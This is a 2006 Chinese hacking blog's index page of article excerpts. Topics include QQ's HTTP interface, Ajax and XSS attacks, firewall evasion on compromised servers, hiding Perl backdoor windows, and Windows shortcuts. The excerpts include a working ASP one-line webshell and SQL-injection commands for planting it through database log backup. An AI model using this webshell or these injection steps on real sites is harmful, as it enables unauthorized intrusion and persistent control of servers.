分类 ‘技术文章’ 下的日志

WEB QQ—QQ的HTTP接口探究

2006/11/30 10:52 | 鬼仔 | 技术文章 | 4 个回复

来源:amxku's Blog

作者:Hackfan
日期:2005.8.21凌晨
联系:QQ:106814 Email:[email protected]
Blog:http://blog.hackfan.net

Update:
2005.8.22凌晨:
  补充了SendMsg和CltMsg对信息长度的限制和处理说明。

1、研究说明

  Tencent在tqq.tencent.com的8000有一个使用HTTP的QQ接口,通过这个接口,可以进行一些基本的操作,如:登陆、登出、改变登陆状态(上线、忙碌、离线、隐身)、添加删除好友、查看好友信息、发送验证信息(接受被加为好友、申请加对方为好友、拒绝被加为好友)、收发用户消息、系统信息。

  目前我研究的是1.1版本的HTTP 阅读全文 »

Tags:

DB_ONER权限日志备分专用一句话木马

2006/11/26 10:08 | 鬼仔 | 技术文章 | 消灭0回复

来源:s0n9 '5 b109

<%eval(request("a")):response.end%> 备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.

日志备分WEBSHELL标准的七步:

1.InjectionURL';alter database XXX set RECOVERY FULL– (把SQL设置成日志完全恢复模式)

2.InjectionURL';create table cmd (a image)– (新建立一个cmd表)

3.InjectionURL';backup log XXX to disk = 'c:\cmd' with init– (减少备分数据的大小)
阅读全文 »

Tags:

命令行下建立虚拟目录

2006/11/24 7:46 | 鬼仔 | 技术文章 | 2 个回复

文章作者:臭要饭的!

很久,很久没有和大家聊天了,很想大家的。见面先就给大家送个小礼吧。其实也不是什么好东西。
在研究和学习中进步,没有研究,没有深入的去了解,就没有进步。认真的学习态度+穷追不舍+十万个为什么。
得到的结果就是成就!
好了,屁话放了太多了。明白的人,不看上面的话都明白。不明白的人,看了也许永远也不会明白。

系统中有个VBS也可以实现这样的功能的。不过我认为,如果在台虚拟主机中,存在多个网站的情况下。
建立虚拟目录,也只能在第一个默认的站点中。一般情况下虚拟主机默认是关掉的。也就是你建好了,通过HTTP也不能访问。
从MSDN中,我找到了一些相关的技术资料,写了个小工具。可以建立在其它站点中。这里看来说起来有点混乱。
阅读全文 »

Tags:

怎样停止ICS防火墙

2006/11/24 5:08 | 鬼仔 | 技术文章 | 消灭0回复

ps:我记得net stop SharedAccess是可以停止的,我成功过。我觉得这篇文章的标题改成“命令行下查看防火墙详细配置”比较准确。

from:swap's blog

现在越来越多的服务器用的是ICS防火墙,配合ipsec来管理远程登陆和端口安全
搞的真是要天下无黑了
很多服务器直接打下来却连不上3389,仔细分析完也没找到什么防火墙或者新鲜软件,ipsec服务关闭以后也没效果。着实郁闷了一翻
想一想就是自带ICS搞的鬼吧

服务中显示:
Windows Firewall/Internet Connection Sharing (ICS)
我们可以用
阅读全文 »

WEB2.0攻击新潮—Ajax Hacking

2006/11/23 5:36 | 鬼仔 | 技术文章 | 消灭0回复

作者:梦之光芒(Monyer)

05年初,随着web2.0这个字眼在中国的各大网络媒体上如潮水般的涌现,Ajax技术(AJAX,即"Asynchronous JavaScript And XML"的缩写,可翻译为异步JavaScript及XML技术。其核心是一个寄宿在浏览器中名为XMLHTTPRequest的类)也立即成为了大家学习研究及讨论的焦点。当然凡事有利亦有弊,黑客们很快就找到了Ajax的可攻击弱点——SQL资料隐码(SQL injections)、跨站脚本(cross-site scripting)和服务拒绝攻击(Denial of Service)等。只是当时web2.0技术尚没 阅读全文 »

Tags: , ,

也谈一个跨站的利用

2006/11/22 9:11 | 鬼仔 | 技术文章 | 消灭0回复

作者:jno
来源:Ph4nt0m Security Team

1.方法:

网易同学录留言功能存在跨站,这里演示一个利用它把自己加为班级管理员的方法。

在留言框里填写:
阅读全文 »

Tags:

关于PERL程序运行不显示CMD窗体的操作

2006/11/22 7:07 | 鬼仔 | 技术文章 | 消灭0回复

作者:demonalex

一直有朋友问我PERL程序如何在运行时不显示CMD窗体,其实这种应用只不过是为了满足大家用PERL写后门或是其他什么东西时不会弹出个奇怪的 CMD窗体而已。。。我一直都认为这能在PERL解释器加载项又或是程序调用中解决这问题,直到最近要调试“黄老太”时才开始考虑这问题,最后找到的解决方案是在perlapp程序编译时解决的,例如我现在写个删除c:\ccc.txt的程序:

#!/bin/perl -w
use Win32::FileOp;
Win32::FileOp->Delete("c:\ccc.txt");
exit 1;

默认的话会跳出个CMD(闪一下吧。。。 阅读全文 »

Tags: ,

Windows的12种快捷方式(2007-4-3修订版)

2006/11/22 7:07 | 鬼仔 | 技术文章 | 1 个回复

版权:electronixtar@gmail.com

快捷方式,很多人的反映就是那个小箭头,其实Windows支持9种快捷方式。

关于这个格式

1. *.lnk
这是微软的通用快捷方式,很多电脑初学者当年就是把一个500MB的游戏在桌面上的1k大小的快捷方式复制到软盘里,然后回家双击打开一看,发现Windows提示“找不到路径”云云。后来才明白这只是个快捷方式。

在命令行里打开一个 lnk 文件: Rundll32.exe url.dll, FileProtocolHandler %L

lnk 的二进制格式 http://www.vckbase.com/document/viewdoc/?id=1411

阅读全文 »

Tags: